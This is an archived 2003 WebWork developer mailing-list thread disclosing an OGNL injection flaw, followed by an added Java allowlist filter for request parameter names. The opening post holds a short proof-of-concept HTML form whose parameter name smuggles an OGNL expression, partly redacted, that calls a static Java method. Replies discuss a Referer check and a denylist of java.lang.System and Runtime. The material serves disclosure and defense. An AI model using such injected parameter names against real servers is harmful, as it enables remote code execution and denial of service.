Disallowing POSTs with unknown referrers doesn't work at all. You can forge the Referer header easily.

Blake

----- Original Message -----
From: "Carlos Villela" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Friday, December 12, 2003 8:32 AM
Subject: Re: [OS-webwork] Security flaw with WW2

OOOOOOUCH!

Ok, possible solutions:

- Disallow POSTs with unknown referers (sucks, but works)
- Disallow use of java.lang.System, java.lang.Runtime and friends in OGNL (good & works)

Good catch, John!

-cv

-----Original Message-----
From: John Patterson [mailto:[EMAIL PROTECTED]]
Sent: Friday, December 12, 2003 11:24
To: Webwork
Subject: [OS-webwork] Security flaw with WW2

Guess what this does?

<html>
<body>
<form method="post" action="http://myhost/app/myAction.action">
<input name="@[EMAIL PROTECTED](1).dummy" value=""/>
</form>
</body>
</html>

John.

-------------------------------------------------------
This SF.net email is sponsored by: SF.net Giveback Program.
Does SourceForge.net help you be more productive? Does it help you create better code?
SHARE THE LOVE, and help us help YOU! Click Here: http://sourceforge.net/donate/
_______________________________________________
Opensymphony-webwork mailing list
[EMAIL PROTECTED]
https://lists.sourceforge.net/lists/listinfo/opensymphony-webwork
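The thread's two proposed fixes are a Referer check (which Blake points out is attacker-controlled) and a denylist of java.lang.System, java.lang.Runtime "and friends" inside OGNL. A third approach a defender would reach for is to never hand a request parameter name to the expression evaluator unless it looks like a plain property path. The following is an added example and is not WebWork's code nor code from anyone in this thread; the class name ParameterNameFilter, the allowlist regex, the length limit and the sample parameters are all assumptions made here (it also uses generics, which did not exist in the Java of 2003). It accepts only dotted identifiers with optional numeric index brackets and rejects everything containing OGNL expression syntax such as '@', '#', '(' or '=', so the decision does not depend on the Referer header at all.

```java
import java.util.LinkedHashMap;
import java.util.Map;
import java.util.regex.Pattern;

/**
 * Added example, not WebWork's own code: an allowlist for request
 * parameter names, applied before any name reaches the OGNL evaluator.
 * Rather than enumerating dangerous classes (a denylist that has to be
 * kept complete), only names that look like property paths are accepted,
 * e.g. "user.name" or "items[3].qty".
 */
public final class ParameterNameFilter {

    // Hypothetical allowlist: identifier, optional [digits] index, repeated with dots.
    private static final Pattern ACCEPTABLE = Pattern.compile(
        "[A-Za-z_][A-Za-z0-9_]*(\\[[0-9]+\\])?(\\.[A-Za-z_][A-Za-z0-9_]*(\\[[0-9]+\\])?)*");

    // Assumed upper bound; real property paths are short.
    private static final int MAX_LENGTH = 100;

    private ParameterNameFilter() {}

    /** True only if the name is a plain property path with no expression syntax. */
    public static boolean isAcceptable(String name) {
        return name != null
            && name.length() <= MAX_LENGTH
            && ACCEPTABLE.matcher(name).matches();
    }

    /**
     * Returns only the parameters whose names pass the allowlist.
     * Rejected names are reported rather than silently dropped: a parameter
     * name that is not a property path is a signal worth alerting on.
     */
    public static Map<String, String[]> filter(Map<String, String[]> params) {
        Map<String, String[]> safe = new LinkedHashMap<>();
        for (Map.Entry<String, String[]> e : params.entrySet()) {
            if (isAcceptable(e.getKey())) {
                safe.put(e.getKey(), e.getValue());
            } else {
                System.err.println("Rejected parameter name: " + e.getKey());
            }
        }
        return safe;
    }

    public static void main(String[] args) {
        // Constructed sample request parameters.
        Map<String, String[]> params = new LinkedHashMap<>();
        params.put("user.name", new String[] {"alice"});        // accepted
        params.put("items[3].qty", new String[] {"2"});         // accepted
        // The name from John's post, with the list archive's redaction left as-is.
        params.put("@[EMAIL PROTECTED](1).dummy", new String[] {""}); // rejected ('@', '(')
        params.put("#session.admin", new String[] {"true"});     // rejected ('#')
        params.put("user.name=(1)", new String[] {""});          // rejected ('=')

        Map<String, String[]> safe = filter(params);
        System.out.println("Accepted: " + safe.keySet());
        // Expected: Accepted: [user.name, items[3].qty]
    }
}
```

Because the check is a full-match allowlist, it does not need to know which classes are dangerous; any future OGNL construct that relies on '@', '#', parentheses, quotes or operators is rejected the same way. The rejected-name log line is the detection hook: in production it would go to the application's security log rather than stderr.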